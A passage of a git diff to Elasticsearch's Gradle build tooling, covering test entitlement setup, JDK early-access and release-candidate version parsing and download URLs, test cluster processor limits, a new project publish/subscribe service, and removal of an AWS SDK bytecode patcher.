task.getName().equals("test")).configureEach(test -> { - test.getInputs().files(patchedFileCollection); - test.systemProperty("tests.hackImmutableCollections", "true"); - test.getJvmArgumentProviders() - .add( - () -> List.of( - "--patch-module=java.base=" + patchedFileCollection.getSingleFile() + "/java.base", - "--add-opens=java.base/java.util=ALL-UNNAMED" - ) + return patchedFileCollection; + } + + private static FileCollection entitlementBridge(Project project) { + return project.getConfigurations().findByName("entitlementBridge"); + } + + /** + * Sets the required JVM options and system properties to enable entitlement enforcement on tests. + *

+ * One command line option is set in {@link #configureJavaBaseModuleOptions} out of necessity, + * since the command line can have only one {@code --patch-module} option for a given module. + */ + private static void configureEntitlements(Project project) { + Configuration agentConfig = project.getConfigurations().create("entitlementAgent"); + Project agent = project.findProject(":libs:entitlement:agent"); + if (agent != null) { + agentConfig.defaultDependencies( + deps -> { deps.add(project.getDependencies().project(Map.of("path", ":libs:entitlement:agent"))); } + ); + } + FileCollection agentFiles = agentConfig; + + Configuration bridgeConfig = project.getConfigurations().create("entitlementBridge"); + Project bridge = project.findProject(":libs:entitlement:bridge"); + if (bridge != null) { + bridgeConfig.defaultDependencies( + deps -> { deps.add(project.getDependencies().project(Map.of("path", ":libs:entitlement:bridge"))); } + ); + } + FileCollection bridgeFiles = bridgeConfig; + + project.getTasks() + .withType(Test.class) + .matching(test -> TEST_TASKS_WITH_ENTITLEMENTS.contains(test.getName())) + .configureEach(test -> { + // See also SystemJvmOptions.maybeAttachEntitlementAgent. + SystemPropertyCommandLineArgumentProvider nonInputSystemProperties = test.getExtensions() + .getByType(SystemPropertyCommandLineArgumentProvider.class); + + // Agent + test.getInputs().files(agentFiles).optional(true); + nonInputSystemProperties.systemProperty("es.entitlement.agentJar", agentFiles::getAsPath); + nonInputSystemProperties.systemProperty("jdk.attach.allowAttachSelf", () -> agentFiles.isEmpty() ? "false" : "true"); + + // Bridge + String modulesContainingEntitlementInstrumentation = "java.logging,java.net.http,java.naming,jdk.net"; + test.getInputs().files(bridgeFiles).optional(true); + // Tests may not be modular, but the JDK still is + test.jvmArgs( + "--add-exports=java.base/org.elasticsearch.entitlement.bridge=ALL-UNNAMED," + + modulesContainingEntitlementInstrumentation ); - }); + }); } + } diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/InternalDistributionArchiveSetupPlugin.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/InternalDistributionArchiveSetupPlugin.java index c2547b72e21fa..7dc6afb28159d 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/InternalDistributionArchiveSetupPlugin.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/InternalDistributionArchiveSetupPlugin.java @@ -74,6 +74,7 @@ private void registerAndConfigureDistributionArchivesExtension(Project project) project.project(subProjectName, sub -> { sub.getPlugins().apply(BasePlugin.class); sub.getArtifacts().add(DEFAULT_CONFIGURATION_NAME, distributionArchive.getArchiveTask()); + sub.getTasks().named("assemble").configure(task -> task.dependsOn(distributionArchive.getArchiveTask())); var extractedConfiguration = sub.getConfigurations().create(EXTRACTED_CONFIGURATION_NAME); extractedConfiguration.setCanBeResolved(false); extractedConfiguration.setCanBeConsumed(true); diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/InternalTestClustersPlugin.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/InternalTestClustersPlugin.java index f1b96016286df..2a2e1ea28d1ec 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/InternalTestClustersPlugin.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/InternalTestClustersPlugin.java @@ -34,12 +34,13 @@ public void apply(Project project) { || buildParams.getBwcVersions().unreleasedInfo(version) == null ); - if (shouldConfigureTestClustersWithOneProcessor()) { - NamedDomainObjectContainer testClusters = (NamedDomainObjectContainer) project - .getExtensions() - .getByName(TestClustersPlugin.EXTENSION_NAME); - testClusters.configureEach(elasticsearchCluster -> elasticsearchCluster.setting("node.processors", "1")); - } + NamedDomainObjectContainer testClusters = (NamedDomainObjectContainer) project + .getExtensions() + .getByName(TestClustersPlugin.EXTENSION_NAME); + // Limit the number of allocated processors for all nodes to 2 in the cluster by default. + // This is to ensure that the tests run consistently across different environments. + String processorCount = shouldConfigureTestClustersWithOneProcessor() ? "1" : "2"; + testClusters.configureEach(elasticsearchCluster -> elasticsearchCluster.setting("node.processors", processorCount)); } private boolean shouldConfigureTestClustersWithOneProcessor() { diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/Jdk.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/Jdk.java index 4396a18c205c1..dfbfe0f16768c 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/Jdk.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/Jdk.java @@ -32,6 +32,7 @@ public class Jdk implements Buildable, Iterable { "(\\d+)(\\.\\d+\\.\\d+(?:\\.\\d+)?)?\\+(\\d+(?:\\.\\d+)?)(@([a-f0-9]{32}))?" ); private static final Pattern LEGACY_VERSION_PATTERN = Pattern.compile("(\\d)(u\\d+)\\+(b\\d+?)(@([a-f0-9]{32}))?"); + private static final Pattern EA_VERSION_PATTERN = Pattern.compile("(\\d+)-(?:ea|rc)\\+(\\d+)(@([a-f0-9]{32}))?"); private final String name; private final FileCollection configuration; @@ -78,7 +79,9 @@ public String getVersion() { } public void setVersion(String version) { - if (VERSION_PATTERN.matcher(version).matches() == false && LEGACY_VERSION_PATTERN.matcher(version).matches() == false) { + if (VERSION_PATTERN.matcher(version).matches() == false + && LEGACY_VERSION_PATTERN.matcher(version).matches() == false + && EA_VERSION_PATTERN.matcher(version).matches() == false) { throw new IllegalArgumentException("malformed version [" + version + "] for jdk [" + name + "]"); } parseVersion(version); @@ -112,7 +115,7 @@ public void setArchitecture(final String architecture) { } public String getDistributionVersion() { - return distributionVersion.get(); + return distributionVersion.getOrNull(); } public void setDistributionVersion(String distributionVersion) { @@ -218,9 +221,17 @@ private void parseVersion(String version) { if (jdkVersionMatcher.matches() == false) { // Try again with the pre-Java9 version format jdkVersionMatcher = LEGACY_VERSION_PATTERN.matcher(version); - if (jdkVersionMatcher.matches() == false) { - throw new IllegalArgumentException("Malformed jdk version [" + version + "]"); + // Try again with the pre-Java9 version format + jdkVersionMatcher = EA_VERSION_PATTERN.matcher(version); + if (jdkVersionMatcher.matches() == false) { + throw new IllegalArgumentException("Malformed jdk version [" + version + "]"); + } + baseVersion = version; + major = jdkVersionMatcher.group(1); + build = jdkVersionMatcher.group(2); + hash = null; + return; } } diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/JdkDownloadPlugin.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/JdkDownloadPlugin.java index 3c278128e43f2..e3fb732696d9d 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/JdkDownloadPlugin.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/JdkDownloadPlugin.java @@ -115,23 +115,39 @@ private void setupRepository(Project project, Jdk jdk) { + "/[module]/[classifier]/jdk/hotspot/normal/adoptium"; } } else if (jdk.getVendor().equals(VENDOR_OPENJDK)) { - repoUrl = "https://download.oracle.com"; - if (jdk.getHash() != null) { + if ("ea".equals(jdk.getDistributionVersion())) { + repoUrl = "https://builds.es-jdk-archive.com/"; // current pattern since 12.0.1 - artifactPattern = "java/GA/jdk" - + jdk.getBaseVersion() - + "/" - + jdk.getHash() - + "/" - + jdk.getBuild() - + "/GPL/openjdk-[revision]_[module]-[classifier]_bin.[ext]"; - } else { - // simpler legacy pattern from JDK 9 to JDK 12 that we are advocating to Oracle to bring back - artifactPattern = "java/GA/jdk" + artifactPattern = "jdks/openjdk/" + jdk.getMajor() - + "/" - + jdk.getBuild() - + "/GPL/openjdk-[revision]_[module]-[classifier]_bin.[ext]"; + + "/openjdk-[revision]/openjdk-[revision]_[module]-[classifier]_bin.[ext]"; + } else if ("rc".equals(jdk.getDistributionVersion())) { + repoUrl = "https://builds.es-jdk-archive.com/"; + // current pattern since 12.0.1 + artifactPattern = "jdks/openjdk/" + + jdk.getMajor() + + "/openjdk-[revision]/openjdk-" + + jdk.getMajor() + + "_[module]-[classifier]_bin.[ext]"; + } else { + repoUrl = "https://download.oracle.com"; + if (jdk.getHash() != null) { + // current pattern since 12.0.1 + artifactPattern = "java/GA/jdk" + + jdk.getBaseVersion() + + "/" + + jdk.getHash() + + "/" + + jdk.getBuild() + + "/GPL/openjdk-[revision]_[module]-[classifier]_bin.[ext]"; + } else { + // simpler legacy pattern from JDK 9 to JDK 12 that we are advocating to Oracle to bring back + artifactPattern = "java/GA/jdk" + + jdk.getMajor() + + "/" + + jdk.getBuild() + + "/GPL/openjdk-[revision]_[module]-[classifier]_bin.[ext]"; + } } } else if (jdk.getVendor().equals(VENDOR_ZULU)) { repoUrl = "https://cdn.azul.com"; diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/ProjectSubscribeBuildService.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/ProjectSubscribeBuildService.java new file mode 100644 index 0000000000000..d9daf8e9d91b0 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/ProjectSubscribeBuildService.java @@ -0,0 +1,51 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal; + +import org.gradle.api.Project; +import org.gradle.api.provider.Provider; +import org.gradle.api.provider.ProviderFactory; +import org.gradle.api.services.BuildService; +import org.gradle.api.services.BuildServiceParameters; + +import java.util.Collection; +import java.util.HashMap; +import java.util.Map; + +import javax.inject.Inject; + +public abstract class ProjectSubscribeBuildService implements BuildService { + + private final ProviderFactory providerFactory; + + /** + * The filling of this map depends on the order of #registerProjectForTopic being called. + * This is usually done during configuration phase, but we do not enforce yet the time of this method call. + * The values are LinkedHashSet to preserve the order of registration mostly to provide a predicatable order + * when running consecutive builds. + * */ + private final Map> versionsByTopic = new HashMap<>(); + + @Inject + public ProjectSubscribeBuildService(ProviderFactory providerFactory) { + this.providerFactory = providerFactory; + } + + /** + * Returning a provider so the evaluation of the map value is deferred to when the provider is queried. + * */ + public Provider> getProjectsByTopic(String topic) { + return providerFactory.provider(() -> versionsByTopic.computeIfAbsent(topic, k -> new java.util.LinkedHashSet<>())); + } + + public void registerProjectForTopic(String topic, Project project) { + versionsByTopic.computeIfAbsent(topic, k -> new java.util.LinkedHashSet<>()).add(project.getPath()); + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/ProjectSubscribeServicePlugin.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/ProjectSubscribeServicePlugin.java new file mode 100644 index 0000000000000..32ed1cf875ddf --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/ProjectSubscribeServicePlugin.java @@ -0,0 +1,44 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal; + +import org.gradle.api.Plugin; +import org.gradle.api.Project; +import org.gradle.api.provider.Provider; + +/** + * This plugin registers a {@link ProjectSubscribeBuildService} to allow projects to + * communicate with each other during the configuration phase. + * + * For example, a project can register itself as a publisher of a topic, and other + * projects can resolve projects that have registered as publishers of that topic. + * + * The actual resolution of whatever data is usually done using dependency declarations. + * Be aware the state of the list depends on the order of project configuration and + * consuming on configuration phase before task graph calculation phase should be avoided. + * + * We want to avoid discouraged plugin api usage like project.allprojects or project.subprojects + * in plugins to avoid unnecessary configuration of projects and not break project isolation and break + * See https://docs.gradle.org/current/userguide/isolated_projects.html + * */ +public class ProjectSubscribeServicePlugin implements Plugin { + + private Provider publishSubscribe; + + @Override + public void apply(Project project) { + publishSubscribe = project.getGradle().getSharedServices().registerIfAbsent("publishSubscribe", ProjectSubscribeBuildService.class); + } + + public Provider getService() { + return publishSubscribe; + } + +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/RestrictedBuildApiService.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/RestrictedBuildApiService.java index 4f3c4b3d94f68..4e9f08bc48f38 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/RestrictedBuildApiService.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/RestrictedBuildApiService.java @@ -56,14 +56,6 @@ private static ListMultimap, String> createLegacyRestTestBasePluginUsag map.put(LegacyRestTestBasePlugin.class, ":x-pack:qa:third-party:jira"); map.put(LegacyRestTestBasePlugin.class, ":x-pack:qa:third-party:pagerduty"); map.put(LegacyRestTestBasePlugin.class, ":x-pack:qa:third-party:slack"); - map.put(LegacyRestTestBasePlugin.class, ":x-pack:plugin:async-search:qa:rest"); - map.put(LegacyRestTestBasePlugin.class, ":x-pack:plugin:autoscaling:qa:rest"); - map.put(LegacyRestTestBasePlugin.class, ":x-pack:plugin:deprecation:qa:early-deprecation-rest"); - map.put(LegacyRestTestBasePlugin.class, ":x-pack:plugin:deprecation:qa:rest"); - map.put(LegacyRestTestBasePlugin.class, ":x-pack:plugin:downsample:qa:with-security"); - map.put(LegacyRestTestBasePlugin.class, ":x-pack:plugin:enrich:qa:rest"); - map.put(LegacyRestTestBasePlugin.class, ":x-pack:plugin:enrich:qa:rest-with-advanced-security"); - map.put(LegacyRestTestBasePlugin.class, ":x-pack:plugin:enrich:qa:rest-with-security"); map.put(LegacyRestTestBasePlugin.class, ":x-pack:plugin:ent-search:qa:rest"); map.put(LegacyRestTestBasePlugin.class, ":x-pack:plugin:eql:qa:ccs-rolling-upgrade"); map.put(LegacyRestTestBasePlugin.class, ":x-pack:plugin:eql:qa:correctness"); diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/SymbolicLinkPreservingTar.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/SymbolicLinkPreservingTar.java index ec4b1fea9e962..b5a19dbdffd0a 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/SymbolicLinkPreservingTar.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/SymbolicLinkPreservingTar.java @@ -41,7 +41,7 @@ * * This task is necessary because the built-in task {@link org.gradle.api.tasks.bundling.Tar} does not preserve symbolic links. */ -public class SymbolicLinkPreservingTar extends Tar { +public abstract class SymbolicLinkPreservingTar extends Tar { @Override protected CopyAction createCopyAction() { diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/dependencies/patches/awsv2sdk/Awsv2ClassPatcher.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/dependencies/patches/awsv2sdk/Awsv2ClassPatcher.java deleted file mode 100644 index 1e515afd8404b..0000000000000 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/dependencies/patches/awsv2sdk/Awsv2ClassPatcher.java +++ /dev/null @@ -1,61 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the "Elastic License - * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side - * Public License v 1"; you may not use this file except in compliance with, at - * your election, the "Elastic License 2.0", the "GNU Affero General Public - * License v3.0 only", or the "Server Side Public License, v 1". - */ - -package org.elasticsearch.gradle.internal.dependencies.patches.awsv2sdk; - -import org.elasticsearch.gradle.internal.dependencies.patches.PatcherInfo; -import org.elasticsearch.gradle.internal.dependencies.patches.Utils; -import org.gradle.api.artifacts.transform.CacheableTransform; -import org.gradle.api.artifacts.transform.InputArtifact; -import org.gradle.api.artifacts.transform.TransformAction; -import org.gradle.api.artifacts.transform.TransformOutputs; -import org.gradle.api.artifacts.transform.TransformParameters; -import org.gradle.api.file.FileSystemLocation; -import org.gradle.api.provider.Provider; -import org.gradle.api.tasks.Classpath; -import org.jetbrains.annotations.NotNull; - -import java.io.File; -import java.util.List; - -import static org.elasticsearch.gradle.internal.dependencies.patches.PatcherInfo.classPatcher; - -@CacheableTransform -public abstract class Awsv2ClassPatcher implements TransformAction { - - private static final String JAR_FILE_TO_PATCH = "aws-query-protocol"; - - private static final List CLASS_PATCHERS = List.of( - // This patcher is needed because of this AWS bug: https://github.com/aws/aws-sdk-java-v2/issues/5968 - // As soon as the bug is resolved and we upgrade our AWS SDK v2 libraries, we can remove this. - classPatcher( - "software/amazon/awssdk/protocols/query/internal/marshall/ListQueryMarshaller.class", - "213e84d9a745bdae4b844334d17aecdd6499b36df32aa73f82dc114b35043009", - StringFormatInPathResolverPatcher::new - ) - ); - - @Classpath - @InputArtifact - public abstract Provider getInputArtifact(); - - @Override - public void transform(@NotNull TransformOutputs outputs) { - File inputFile = getInputArtifact().get().getAsFile(); - - if (inputFile.getName().startsWith(JAR_FILE_TO_PATCH)) { - System.out.println("Patching " + inputFile.getName()); - File outputFile = outputs.file(inputFile.getName().replace(".jar", "-patched.jar")); - Utils.patchJar(inputFile, outputFile, CLASS_PATCHERS); - } else { - System.out.println("Skipping " + inputFile.getName()); - outputs.file(getInputArtifact()); - } - } -} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/dependencies/patches/awsv2sdk/StringFormatInPathResolverPatcher.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/dependencies/patches/awsv2sdk/StringFormatInPathResolverPatcher.java deleted file mode 100644 index 506dab001dbe7..0000000000000 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/dependencies/patches/awsv2sdk/StringFormatInPathResolverPatcher.java +++ /dev/null @@ -1,89 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the "Elastic License - * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side - * Public License v 1"; you may not use this file except in compliance with, at - * your election, the "Elastic License 2.0", the "GNU Affero General Public - * License v3.0 only", or the "Server Side Public License, v 1". - */ - -package org.elasticsearch.gradle.internal.dependencies.patches.awsv2sdk; - -import org.objectweb.asm.ClassVisitor; -import org.objectweb.asm.ClassWriter; -import org.objectweb.asm.MethodVisitor; -import org.objectweb.asm.Type; - -import java.util.Locale; - -import static org.objectweb.asm.Opcodes.ASM9; -import static org.objectweb.asm.Opcodes.GETSTATIC; -import static org.objectweb.asm.Opcodes.INVOKESTATIC; - -class StringFormatInPathResolverPatcher extends ClassVisitor { - - StringFormatInPathResolverPatcher(ClassWriter classWriter) { - super(ASM9, classWriter); - } - - @Override - public MethodVisitor visitMethod(int access, String name, String descriptor, String signature, String[] exceptions) { - return new ReplaceCallMethodVisitor(super.visitMethod(access, name, descriptor, signature, exceptions)); - } - - /** - * Replaces calls to String.format(format, args); with calls to String.format(Locale.ROOT, format, args); - */ - private static class ReplaceCallMethodVisitor extends MethodVisitor { - private static final String CLASS_INTERNAL_NAME = Type.getInternalName(String.class); - private static final String METHOD_NAME = "format"; - private static final String OLD_METHOD_DESCRIPTOR = Type.getMethodDescriptor( - Type.getType(String.class), - Type.getType(String.class), - Type.getType(Object[].class) - ); - private static final String NEW_METHOD_DESCRIPTOR = Type.getMethodDescriptor( - Type.getType(String.class), - Type.getType(Locale.class), - Type.getType(String.class), - Type.getType(Object[].class) - ); - - private boolean foundFormatPattern = false; - - ReplaceCallMethodVisitor(MethodVisitor methodVisitor) { - super(ASM9, methodVisitor); - } - - @Override - public void visitLdcInsn(Object value) { - if (value instanceof String s && s.startsWith("%s")) { - if (foundFormatPattern) { - throw new IllegalStateException( - "A previous string format constant was not paired with a String.format() call. " - + "Patching would generate an unbalances stack" - ); - } - // Push the extra arg on the stack - mv.visitFieldInsn(GETSTATIC, Type.getInternalName(Locale.class), "ROOT", Type.getDescriptor(Locale.class)); - foundFormatPattern = true; - } - super.visitLdcInsn(value); - } - - @Override - public void visitMethodInsn(int opcode, String owner, String name, String descriptor, boolean isInterface) { - if (opcode == INVOKESTATIC - && foundFormatPattern - && CLASS_INTERNAL_NAME.equals(owner) - && METHOD_NAME.equals(name) - && OLD_METHOD_DESCRIPTOR.equals(descriptor)) { - // Replace the call with String.format(Locale.ROOT, format, args) - mv.visitMethodInsn(INVOKESTATIC, CLASS_INTERNAL_NAME, METHOD_NAME, NEW_METHOD_DESCRIPTOR, false); - foundFormatPattern = false; - } else { - super.visitMethodInsn(opcode, owner, name, descriptor, isInterface); - } - } - } -} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/idea/IdeaXmlUtil.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/idea/IdeaXmlUtil.java index b7cc2862a0af1..7fbc9c341603b 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/idea/IdeaXmlUtil.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/idea/IdeaXmlUtil.java @@ -10,8 +10,8 @@ package org.elasticsearch.gradle.internal.idea; import groovy.util.Node; -import groovy.util.XmlParser; import groovy.xml.XmlNodePrinter; +import groovy.xml.XmlParser; import org.gradle.api.Action; import org.xml.sax.SAXException; diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/BranchesFileParser.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/BranchesFileParser.java new file mode 100644 index 0000000000000..1c502a633e1ec --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/BranchesFileParser.java @@ -0,0 +1,46 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.info; + +import com.fasterxml.jackson.databind.JsonNode; +import com.fasterxml.jackson.databind.ObjectMapper; + +import org.elasticsearch.gradle.Version; + +import java.io.IOException; +import java.io.UncheckedIOException; +import java.util.ArrayList; +import java.util.List; + +/** + * A parser for the branches.json file + */ +public class BranchesFileParser { + + private final ObjectMapper objectMapper; + + public BranchesFileParser(ObjectMapper objectMapper) { + this.objectMapper = objectMapper; + } + + public List parse(byte[] bytes) { + List branches = new ArrayList<>(); + try { + JsonNode json = objectMapper.readTree(bytes); + for (JsonNode node : json.get("branches")) { + branches.add(new DevelopmentBranch(node.get("branch").asText(), Version.fromString(node.get("version").asText()))); + } + } catch (IOException e) { + throw new UncheckedIOException("Failed to parse content of branches.json", e); + } + + return branches; + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/BuildParameterExtension.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/BuildParameterExtension.java index d6c8e38dac2c3..c3c2a9cdfe672 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/BuildParameterExtension.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/BuildParameterExtension.java @@ -32,6 +32,8 @@ public interface BuildParameterExtension { Boolean getIsRuntimeJavaHomeSet(); + RuntimeJava getRuntimeJava(); + List getJavaVersions(); JavaVersion getMinimumCompilerVersion(); diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/DefaultBuildParameterExtension.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/DefaultBuildParameterExtension.java index 760664f9fa025..ccda893cc9500 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/DefaultBuildParameterExtension.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/DefaultBuildParameterExtension.java @@ -28,7 +28,7 @@ public abstract class DefaultBuildParameterExtension implements BuildParameterExtension { private final Provider inFipsJvm; private final Provider runtimeJavaHome; - private final Boolean isRuntimeJavaHomeSet; + private final RuntimeJava runtimeJava; private final List javaVersions; private final JavaVersion minimumCompilerVersion; private final JavaVersion minimumRuntimeVersion; @@ -50,11 +50,8 @@ public abstract class DefaultBuildParameterExtension implements BuildParameterEx public DefaultBuildParameterExtension( ProviderFactory providers, - Provider runtimeJavaHome, + RuntimeJava runtimeJava, Provider> javaToolChainSpec, - Provider runtimeJavaVersion, - boolean isRuntimeJavaHomeSet, - Provider runtimeJavaDetails, List javaVersions, JavaVersion minimumCompilerVersion, JavaVersion minimumRuntimeVersion, @@ -68,11 +65,11 @@ public DefaultBuildParameterExtension( Provider bwcVersions ) { this.inFipsJvm = providers.systemProperty("tests.fips.enabled").map(DefaultBuildParameterExtension::parseBoolean); - this.runtimeJavaHome = cache(providers, runtimeJavaHome); + this.runtimeJava = runtimeJava; + this.runtimeJavaHome = cache(providers, runtimeJava.getJavahome()); this.javaToolChainSpec = cache(providers, javaToolChainSpec); - this.runtimeJavaVersion = cache(providers, runtimeJavaVersion); - this.isRuntimeJavaHomeSet = isRuntimeJavaHomeSet; - this.runtimeJavaDetails = cache(providers, runtimeJavaDetails); + this.runtimeJavaVersion = cache(providers, runtimeJava.getJavaVersion()); + this.runtimeJavaDetails = cache(providers, runtimeJava.getVendorDetails()); this.javaVersions = javaVersions; this.minimumCompilerVersion = minimumCompilerVersion; this.minimumRuntimeVersion = minimumRuntimeVersion; @@ -116,7 +113,12 @@ public void withFipsEnabledOnly(Task task) { @Override public Boolean getIsRuntimeJavaHomeSet() { - return isRuntimeJavaHomeSet; + return runtimeJava.isExplicitlySet(); + } + + @Override + public RuntimeJava getRuntimeJava() { + return runtimeJava; } @Override diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/DevelopmentBranch.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/DevelopmentBranch.java new file mode 100644 index 0000000000000..964db5eabd4b7 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/DevelopmentBranch.java @@ -0,0 +1,28 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.info; + +import org.elasticsearch.gradle.Version; + +import java.io.Serializable; +import java.util.Objects; + +/** + * Information about a development branch used in branches.json file + * + * @param name Name of the development branch + * @param version Elasticsearch version on the development branch + */ +public record DevelopmentBranch(String name, Version version) implements Serializable { + public DevelopmentBranch { + Objects.requireNonNull(name); + Objects.requireNonNull(version); + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/GlobalBuildInfoPlugin.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/GlobalBuildInfoPlugin.java index 675f1198b2a7d..fba659a39982d 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/GlobalBuildInfoPlugin.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/GlobalBuildInfoPlugin.java @@ -8,13 +8,17 @@ */ package org.elasticsearch.gradle.internal.info; -import com.fasterxml.jackson.databind.JsonNode; import com.fasterxml.jackson.databind.ObjectMapper; import org.apache.commons.io.IOUtils; -import org.elasticsearch.gradle.VersionProperties; +import org.elasticsearch.gradle.Architecture; +import org.elasticsearch.gradle.OS; +import org.elasticsearch.gradle.Version; import org.elasticsearch.gradle.internal.BwcVersions; +import org.elasticsearch.gradle.internal.Jdk; +import org.elasticsearch.gradle.internal.JdkDownloadPlugin; import org.elasticsearch.gradle.internal.conventions.GitInfoPlugin; +import org.elasticsearch.gradle.internal.conventions.VersionPropertiesPlugin; import org.elasticsearch.gradle.internal.conventions.info.GitInfo; import org.elasticsearch.gradle.internal.conventions.info.ParallelDetector; import org.elasticsearch.gradle.internal.conventions.util.Util; @@ -22,6 +26,7 @@ import org.gradle.api.Action; import org.gradle.api.GradleException; import org.gradle.api.JavaVersion; +import org.gradle.api.NamedDomainObjectContainer; import org.gradle.api.Plugin; import org.gradle.api.Project; import org.gradle.api.logging.Logger; @@ -42,7 +47,6 @@ import org.gradle.jvm.toolchain.JvmVendorSpec; import org.gradle.jvm.toolchain.internal.InstallationLocation; import org.gradle.util.GradleVersion; -import org.jetbrains.annotations.NotNull; import java.io.BufferedReader; import java.io.File; @@ -51,28 +55,39 @@ import java.io.InputStream; import java.io.InputStreamReader; import java.io.UncheckedIOException; +import java.net.URI; import java.nio.file.Files; -import java.util.ArrayList; import java.util.List; import java.util.Locale; +import java.util.Properties; import java.util.Random; import java.util.concurrent.atomic.AtomicReference; +import java.util.regex.Matcher; +import java.util.regex.Pattern; import java.util.stream.Collectors; import java.util.stream.Stream; import javax.inject.Inject; import static org.elasticsearch.gradle.internal.conventions.GUtils.elvis; +import static org.elasticsearch.gradle.internal.conventions.VersionPropertiesPlugin.VERSIONS_EXT; +import static org.elasticsearch.gradle.internal.toolchain.EarlyAccessCatalogJdkToolchainResolver.findLatestPreReleaseBuild; +import static org.elasticsearch.gradle.internal.toolchain.EarlyAccessCatalogJdkToolchainResolver.findPreReleaseBuild; public class GlobalBuildInfoPlugin implements Plugin { private static 